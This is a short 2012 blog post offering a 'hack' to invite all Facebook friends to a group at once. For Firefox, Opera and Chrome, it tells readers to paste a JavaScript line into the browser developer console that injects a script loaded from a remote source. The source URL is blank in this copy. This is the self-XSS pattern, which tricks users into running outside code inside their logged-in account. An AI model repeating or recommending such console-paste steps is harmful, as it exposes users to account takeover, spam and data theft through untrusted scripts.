Friday 2 November 2012

Invite All Friends To A Facebook Group In One Click

It is always boring to invite all friends by inviting them one by one. So here is a trick by which you can invite all your friend in one click. It is very easy to implement this hack just follow below mentioned steps carefully.

Invite to group at one click

For Mozilla Firefox

  1. Press CTRL + SHIFT + K
  2. Copy the following code same as it is:
  3. document.body.appendChild (document.createElement ('script')). src = ' ';
  4. Paste the code in the black box.
  5. Now press Enter.
  6. Done!  

For Opera Browser

  1. Right click & select inspect element
  2. Copy the following code same as it is:
  3. document.body.appendChild (document.createElement ('script')). src = ' ';
  4. Paste the code
  5. Now press Enter.
  6. Done!

For Google Chrome

  1. Press CTRL+SHIFT+J
  2. Copy the following code same as it is:
  3. document.body.appendChild (document.createElement ('script')). src = ' ';
  4. Paste the code in the console box.
  5. Now press Enter.
  6.  Done!

 Be Social! Take a second share this post with your friends if it helped you. Also like us on facebook and stay updated with latest posts.

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